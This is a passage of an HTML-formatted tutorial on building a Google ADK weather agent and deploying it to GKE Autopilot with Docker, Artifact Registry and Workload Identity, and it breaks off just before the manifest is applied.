&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud SDK (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) installed and configured.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;A Google Cloud project with billing enabled.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;kubectl&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; command-line tool.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;jq&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for parsing JSON responses.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The following APIs enabled: Kubernetes Engine, Artifact Registry, and Vertex AI.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Step 0: Configuring Google Cloud and Authentication&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Before interacting with Google Cloud services, you must authenticate your environment and set the active project. This ensures that both the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; CLI and your local Python environment can access Vertex AI.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Log in to the Google Cloud SDK&lt;/strong&gt;:&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud auth login&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Set your active project&lt;/strong&gt;:&lt;span style="vertical-align: baseline;"&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud config set project [PROJECT_ID]&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Set up Application Default Credentials (ADC)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: This is crucial for the ADK library to authenticate with Vertex AI during local testing.&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud auth application-default login&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Define Environment Variables&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: To ensure we can easily reuse our configuration in subsequent steps, let's export our project, region, and cluster name as environment variables. &lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;export PROJECT_ID=$(gcloud config get-value project)
export REGION=us-central1
export CLUSTER_NAME=adk-cluster&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Step 1: Provisioning GKE Autopilot&lt;/h3&gt;
&lt;p&gt;GKE Autopilot is the recommended way to run Kubernetes without managing nodes. It allows you to focus on your agent deployment while Google manages the infrastructure. Starting the cluster creation now allows it to provision in the background while we build the agent.&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud container clusters create-auto $CLUSTER_NAME --region $REGION&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While the cluster is provisioning, we can move on to building our agent.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Step 2: Building the Agent with ADK&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;First, let's create our agent. Start by creating a folder for the agent code:&lt;br/&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;mkdir adk-agent
cd adk-agent&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Initialize a new Python project with uv:&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;uv init&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Add the ADK dependency:&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;uv add google-adk&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a new agent using the ADK CLI:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;uv run adk create weather_agent&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The CLI prompts you for several values. For the root agent model, choose &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gemini-2.5-flash&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; (option 1). For the backend, choose &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Vertex AI&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; (option 2). Then enter your Google Cloud project ID and a Google Cloud region, for example &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;us-central1&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The previous command scaffolded a new directory &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;weather_agent&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with the following structure:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-plain"&gt;&lt;code&gt;weather_agent/
├── .env
├── __init__.py
└── agent.py&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;ADK requires the agent code to be in an &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;agent.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file. Let's edit &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;agent.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to add a simple tool for the agent.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-python"&gt;&lt;code&gt;from google.adk import Agent


# Define a simple tool for the agent
def get_weather(city: str) -&amp;gt; str:
    """Returns the current weather in a city."""
    return f"The weather in {city} is 90 degrees Fahrenheit and sunny."


# Initialize the agent with Vertex AI and Gemini
root_agent = Agent(
    name="weather_agent",
    model="gemini-2.5-flash",  # the model selected during `adk create`
    tools=[get_weather],
)&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;agent.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file is the entry point for the agent. It is used to define the agent and its tools. The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;get_weather&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; function is a simple tool that returns the current weather in a city. For the purpose of this tutorial, we are using a hardcoded value for the weather. In a real-world scenario, you would use an API to get the current weather.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
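&lt;p&gt;As a rough sketch of a slightly less hardcoded tool, the function below keeps the tutorial's tool name but looks the city up in a small in-memory table and returns a dictionary with a status field, so a failed lookup is distinguishable from a successful one. The table contents, the dictionary keys, and the &lt;code&gt;_FAKE_WEATHER&lt;/code&gt; name are illustrative assumptions, not part of ADK or of the original tutorial; a real tool would call a weather API instead.&lt;/p&gt;

```python
# Illustrative stand-in data (an assumption); a real tool would query a weather API.
_FAKE_WEATHER = {
    "london": "cloudy, 59 degrees Fahrenheit",
    "phoenix": "sunny, 90 degrees Fahrenheit",
}


def get_weather(city: str) -> dict:
    """Returns the current weather in a city, or an error for unknown cities."""
    report = _FAKE_WEATHER.get(city.strip().lower())
    if report is None:
        return {"status": "error", "message": f"No weather data for {city}."}
    return {"status": "success", "report": f"The weather in {city} is {report}."}


if __name__ == "__main__":
    print(get_weather("Phoenix"))
    print(get_weather("Atlantis"))
```

&lt;p&gt;Because the function is plain Python with type hints and a docstring, it can be unit-tested on its own before it is passed to the agent in the &lt;code&gt;tools&lt;/code&gt; list.&lt;/p&gt;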
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Step 3: Testing the Agent Locally&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before deploying the agent to GKE Autopilot, we need to test it locally to ensure it works as expected. Run the following command to start the agent in debug mode with the web UI:&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;uv run adk web&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Open &lt;/span&gt;&lt;a href="http://localhost:8000" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;http://localhost:8000&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in your browser and you should see the ADK web UI. You can then interact with your agent by typing messages in the chat interface.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;If the agent replies with a message like "The weather in [CITY] is 90 degrees Fahrenheit and sunny.", congratulations: your ADK agent is working, and you can proceed to the next step.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Step 4: Preparing for GKE Autopilot&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The ADK CLI has a built-in command to deploy the agent to GKE Autopilot. However, its default settings are not suitable for a production environment. For example, they do not use Workload Identity for authentication with Vertex AI, and they expose the web UI through a load balancer on port 80.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We will instead manage the lifecycle of the container ourselves. First we need to containerize the agent.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;.dockerignore&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file in the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;adk-agent&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; directory to prevent your local virtual environment from being copied into the image:&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-plain"&gt;&lt;code&gt;.venv
.adk
__pycache__
*.pyc
.env&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Dockerfile&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for your agent in the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;adk-agent&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; directory. We will use a multi-stage build to keep the final production image lightweight and secure:&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-plain"&gt;&lt;code&gt;# Stage 1: Build the virtual environment
FROM python:3.10-slim AS builder

# Install uv
COPY --from=ghcr.io/astral-sh/uv:latest /uv /uvx /bin/

# Set working directory
WORKDIR /app

# Force uv to use the system Python and use copy instead of symlinks
ENV UV_PYTHON_PREFERENCE=only-system
ENV UV_LINK_MODE=copy
ENV UV_COMPILE_BYTECODE=1
ENV UV_PYTHON=/usr/local/bin/python3

# Install dependencies
# We copy only files needed for installation to maximize cache
COPY pyproject.toml uv.lock ./
# Note: We don't use --frozen yet as the host lock file might be slightly out of sync
# but sync will update it in the builder stage.
RUN uv sync --no-install-project --no-dev --no-cache

# Copy the agent code
COPY . .
# Sync the project itself
RUN uv sync --no-dev --no-cache

# Stage 2: Runtime image
FROM python:3.10-slim

WORKDIR /app

# Copy the pre-built environment from the builder
COPY --from=builder /app/.venv /app/.venv
# Copy the application code (including weather_agent folder)
COPY . .

# Add the environment to the PATH
ENV PATH="/app/.venv/bin:$PATH"
ENV PYTHONUNBUFFERED=1

# Run the ADK API server
# We point to the current directory (/app), which contains the weather_agent folder
CMD ["adk", "api_server", ".", "--host", "0.0.0.0", "--port", "8080"]&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Build and push the image to Artifact Registry:&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;# Create repository
gcloud artifacts repositories create adk-repo --repository-format=docker --location=$REGION

# Build and push
gcloud builds submit --tag $REGION-docker.pkg.dev/$PROJECT_ID/adk-repo/gke-agent:latest&lt;/code&gt;&lt;/pre&gt;
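&lt;p&gt;The image path passed to &lt;code&gt;--tag&lt;/code&gt; follows the pattern region, project, repository, image name, and tag. The helper below is only a sketch of how that path is assembled from the values used in this tutorial; the function name &lt;code&gt;image_uri&lt;/code&gt; and the fallback values &lt;code&gt;my-project&lt;/code&gt; and &lt;code&gt;us-central1&lt;/code&gt; are assumptions made for illustration.&lt;/p&gt;

```python
import os


def image_uri(project_id: str, region: str, repo: str = "adk-repo",
              image: str = "gke-agent", tag: str = "latest") -> str:
    """Builds an Artifact Registry Docker image path from its parts."""
    return f"{region}-docker.pkg.dev/{project_id}/{repo}/{image}:{tag}"


if __name__ == "__main__":
    # Falls back to placeholder values when the Step 0 variables are unset.
    project = os.environ.get("PROJECT_ID", "my-project")
    region = os.environ.get("REGION", "us-central1")
    print(image_uri(project, region))
```

&lt;p&gt;The same string appears again in the Deployment manifest, so building it in one place helps keep the pushed image and the deployed image in sync.&lt;/p&gt;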
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Step 5: Implementing Workload Identity for Security&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Security is paramount. Instead of hardcoding API keys, we use Workload Identity to grant the GKE pod permission to access Vertex AI.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;1. Create an IAM Service Account&lt;/strong&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud iam service-accounts create adk-gke-sa&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;2. Grant Vertex AI permissions&lt;/strong&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud projects add-iam-policy-binding $PROJECT_ID \
    --member="serviceAccount:adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/aiplatform.user"&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;3. Allow the Kubernetes Service Account to impersonate the IAM SA&lt;/strong&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud iam service-accounts add-iam-policy-binding adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com \
    --role="roles/iam.workloadIdentityUser" \
    --member="serviceAccount:$PROJECT_ID.svc.id.goog[default/adk-ksa]"&lt;/code&gt;&lt;/pre&gt;
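&lt;p&gt;The two identifiers used in these commands have fixed formats: the IAM service account email, and the Workload Identity member string that names a Kubernetes Service Account by project, namespace, and name. The sketch below spells out both formats using the values from this step; the function names are hypothetical helpers introduced only for illustration.&lt;/p&gt;

```python
def iam_service_account_email(project_id: str, sa_name: str) -> str:
    """Formats the email address of an IAM service account in a project."""
    return f"{sa_name}@{project_id}.iam.gserviceaccount.com"


def workload_identity_member(project_id: str, namespace: str, ksa_name: str) -> str:
    """Formats the IAM member string for a Kubernetes Service Account."""
    return f"serviceAccount:{project_id}.svc.id.goog[{namespace}/{ksa_name}]"


if __name__ == "__main__":
    # "my-project" is a placeholder project ID.
    print(iam_service_account_email("my-project", "adk-gke-sa"))
    print(workload_identity_member("my-project", "default", "adk-ksa"))
```

&lt;p&gt;The namespace and name in the member string must match the Kubernetes Service Account that the pods run as, which in this tutorial is &lt;code&gt;adk-ksa&lt;/code&gt; in the &lt;code&gt;default&lt;/code&gt; namespace.&lt;/p&gt;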
&lt;h3&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Step 6: Deploying the Agent to GKE&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Now, we define the Kubernetes resources. Create a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;deployment.yaml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; that includes the Service Account annotation for Workload Identity. Replace &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;$PROJECT_ID&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;$REGION&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with your actual project ID and region.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-plain"&gt;&lt;code&gt;apiVersion: v1
kind: ServiceAccount
metadata:
  name: adk-ksa
  annotations:
    iam.gke.io/gcp-service-account: adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: adk-agent
spec:
  replicas: 2
  selector:
    matchLabels:
      app: adk-agent
  template:
    metadata:
      labels:
        app: adk-agent
    spec:
      serviceAccountName: adk-ksa
      containers:
      - name: adk-agent
        image: $REGION-docker.pkg.dev/$PROJECT_ID/adk-repo/gke-agent:latest
        resources:
          requests:
            cpu: "500m"
            memory: "512Mi"
          limits: 
            cpu: "1"
            memory: "1Gi"
        ports:
        - containerPort: 8080
---
apiVersion: v1
kind: Service
metadata:
  name: adk-service
spec:
  selector:
    app: adk-agent
  ports:
  - port: 80
    targetPort: 8080&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Apply the configuration:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
